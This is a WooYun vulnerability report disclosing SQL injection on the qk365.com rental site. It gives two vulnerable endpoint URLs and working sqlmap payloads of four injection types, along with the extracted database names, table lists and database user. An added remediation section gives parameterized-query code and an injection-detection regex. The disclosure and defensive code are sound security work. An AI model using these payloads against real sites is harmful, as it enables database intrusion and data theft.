Vulnerability summary

Defect ID: wooyun-2015-0152186

Vulnerability title: SQL injection on the Qingke (青客) main site, affecting the entire site's databases

Affected vendor: qk365.com

Vulnerability author: 路人甲

Submitted: 2015-11-06 11:36

Fixed: 2015-12-21 19:12

Published: 2015-12-21 19:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-11-06: Details sent to the vendor, awaiting vendor handling
2015-11-06: Vendor confirmed; details disclosed to the vendor only
2015-11-16: Details disclosed to core white hats and relevant domain experts
2015-11-26: Details disclosed to regular white hats
2015-12-06: Details disclosed to intern white hats
2015-12-21: Details disclosed to the public

Brief description:

.

Detailed description:

1. http://www.qk365.com/news/elive/infoRight_ajax.do?channelParPagemark=1&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
2. www.qk365.com/news/elive/infoRight_ajaxLink.do?classPagemark=*&num=99&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481

Proof of vulnerability:

---
Parameter: channelParPagemark (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channelParPagemark=1') AND 9321=9321 AND ('LoVW'='LoVW&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: channelParPagemark=1') AND (SELECT 3580 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(3580=3580,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('IeTY'='IeTY&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: channelParPagemark=1') AND (SELECT * FROM (SELECT(SLEEP(5)))CAhr) AND ('RfwH'='RfwH&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: channelParPagemark=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176716b71,0x4a616c744d4654497046704a5a59714869496f7a6e695045566a4476414c76454c575a566e696f4c,0x716b716b71),NULL,NULL,NULL,NULL-- -&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20
---
back-end DBMS: MySQL 5.0
current user: 'yijia_guest@10.10.10.%'
current user is DBA: False
available databases [15]:
[*] db_wuye
[*] ecombehaviour
[*] ecomhouserent
[*] freecms
[*] freecms_sim
[*] information_schema
[*] mysql
[*] partybuilding
[*] qingke_crm
[*] quartz
[*] quartz_kq
[*] quartz_pro
[*] quartz_rpt
[*] stock
[*] test
Database: ecomhouserent
[88 tables]
+------------------------------+
| activity |
| activity_room |
| agency_clue |
| app_device_source |
| app_login_source |
| app_login_source_sync |
| area |
| base_info |
| bill_manage |
| cell_area |
| cell_area_bak |
| cell_area_copy |
| cell_photo |
| cell_photo_temp |
| collectionroom |
| comment |
| contract |
| coupon_user_list |
| customer_apply |
| customer_book |
| customer_cell |
| customer_reminder |
| customer_tenant |
| customer_tenant_copy |
| discuss |
| discuss_praise |
| drawcode_list |
| find_password |
| gift_detail |
| gift_type |
| goddess |
| hot_search_keys |
| info_notice |
| join_activity |
| landmark |
| leave_message |
| link_man |
| link_road |
| nyrecord |
| operatelog |
| owner_info |
| pay_type |
| payment |
| petty_expenses |
| petty_item |
| promotion_coupon |
| provincial |
| provincial_bak |
| push_message |
| reservation |
| review |
| road |
| room |
| room_admin |
| room_recomm |
| room_view |
| share_record |
| sig_reservation_subscription |
| subscription |
| subway |
| subway_station_code |
| t_coupons |
| t_coupons_code |
| t_feedback |
| t_mer_info |
| tmp_a |
| user_openid |
| user_openid_copy |
| v_find_booking |
| v_find_interest_rooms |
| v_find_new_rooms |
| v_find_orderform |
| v_find_reservation |
| v_find_rom_recomm |
| v_find_room_detail |
| v_find_room_friends |
| v_find_subscription |
| v_find_taobao_room_detail |
| v_rom_recomm |
| v_rom_rocomm_group |
| v_room_compara |
| v_stat_reservation |
| v_wx_double12 |
| v_wx_double12_a |
| v_wx_double12_b |
| village_ |
| vote |
| voucher |
+------------------------------+
Database: db_wuye
[54 tables]
+-----------------------------+
| account_payment_relation |
| assign_log |
| bill_common |
| bill_detail |
| bill_task_bak |
| bill_task_main |
| building_num |
| camera_link_log |
| device_upload_info |
| dict_data |
| dict_type |
| fee_cost |
| model_acitvity_log |
| notice_info |
| pass_log |
| pay_mobile_call_log |
| property_company |
| rate_info |
| region_info |
| region_info_copy |
| repair_attach |
| repair_bill_info |
| room_info |
| room_user_info |
| room_user_relation |
| sms_log |
| software_release |
| sys_auth_info |
| sys_log |
| sys_org_info |
| sys_org_staff_relation |
| sys_role_auth_relation |
| sys_role_info |
| sys_staff_info |
| sys_staff_role_relation |
| third_pay_backcall_log |
| third_payment |
| user_apply_info |
| user_audit_log |
| user_citizen |
| user_command_log |
| user_device_info |
| user_door_detail |
| user_enterprise |
| user_face_pool |
| user_info |
| user_message_read |
| user_visitor_room_info |
| user_worker_info |
| village_info |
| village_userworker_relation |
| visitor_log |
| visitor_third_log |
| wx_token_record |
+-----------------------------+

Remediation:

~~~
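The report leaves the remediation section empty. As an added illustration, not code from the reporter or from qk365.com, the block below uses a constructed in-memory SQLite table (table and column names are assumptions) to show the string-concatenation pattern the payloads imply beside a parameterized version, measures the boolean oracle that the report's first sqlmap probe relies on, adds a format whitelist for the parameter (the numeric-id format is an assumption), and includes a decoded-query-string check a defender can run over access logs for the payload shapes listed in the proof section.

```python
import re
import sqlite3
import urllib.parse

# Constructed sample rows standing in for the site's content table; the table
# and column names are assumptions, not the real qk365.com schema.
SAMPLE_ROWS = [("1", "Listing A"), ("2", "Listing B"), ("3", "Listing C")]

# The boolean-based blind probe quoted in the report's sqlmap output, plus the
# same probe with its comparison flipped so the two responses can be compared.
PAYLOAD_TRUE = "1') AND 9321=9321 AND ('LoVW'='LoVW"
PAYLOAD_FALSE = "1') AND 9321=9322 AND ('LoVW'='LoVW"


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE info (channel_pagemark TEXT, title TEXT)")
    conn.executemany("INSERT INTO info VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def query_vulnerable(conn, pagemark):
    """String concatenation. The ('...') quoting is inferred from the report's
    payloads, which each close a quote and a parenthesis before injecting."""
    sql = "SELECT title FROM info WHERE (channel_pagemark = ('%s'))" % pagemark
    return [row[0] for row in conn.execute(sql)]


def query_safe(conn, pagemark):
    """Parameterized query: the driver binds the value, so quotes and
    parentheses inside it are data, never SQL syntax."""
    sql = "SELECT title FROM info WHERE (channel_pagemark = ?)"
    return [row[0] for row in conn.execute(sql, (pagemark,))]


# Assumed format for channelParPagemark: a short numeric id.
PAGEMARK_RE = re.compile(r"[0-9]{1,10}")


def is_accepted(pagemark):
    """True when the whitelist validator accepts the raw parameter value."""
    return PAGEMARK_RE.fullmatch(pagemark) is not None


def query_validated(conn, pagemark):
    """Defense in depth: reject malformed ids before the database sees them."""
    if not is_accepted(pagemark):
        raise ValueError("channelParPagemark must be a short numeric id")
    return query_safe(conn, pagemark)


def blind_oracle_gap(query_fn):
    """Row-count difference between the TRUE and FALSE probes. A nonzero gap
    is exactly the signal a boolean-based blind injection extracts data with;
    zero means the endpoint gives the probe nothing to read."""
    conn = make_db()
    return len(query_fn(conn, PAYLOAD_TRUE)) - len(query_fn(conn, PAYLOAD_FALSE))


# Fragments shared by the report's boolean, error-based, time-based and UNION
# payloads; a constructed regex for log review, to be tuned before production use.
SQLI_MARKERS = re.compile(
    r"(\bAND\b\s*\(?\s*SELECT\b|\bSLEEP\s*\(|\bUNION\s+ALL\s+SELECT\b|'\)\s*AND\b)",
    re.IGNORECASE,
)


def looks_like_sqli(query_string):
    """True when a URL-decoded query string carries one of the injection shapes."""
    return SQLI_MARKERS.search(urllib.parse.unquote_plus(query_string)) is not None


if __name__ == "__main__":
    print("oracle gap, concatenated query:", blind_oracle_gap(query_vulnerable))  # 1
    print("oracle gap, parameterized query:", blind_oracle_gap(query_safe))       # 0
```

The parameterized query alone closes the injection; the whitelist and the log check are layered on top because the report shows four distinct injection techniques against one parameter, and the user `yijia_guest` could enumerate fifteen databases without DBA rights, which argues for also reviewing that account's grants.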

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-06 19:10

Vendor reply:

Thank you very much; an emergency fix has been scheduled.

Latest status:

None yet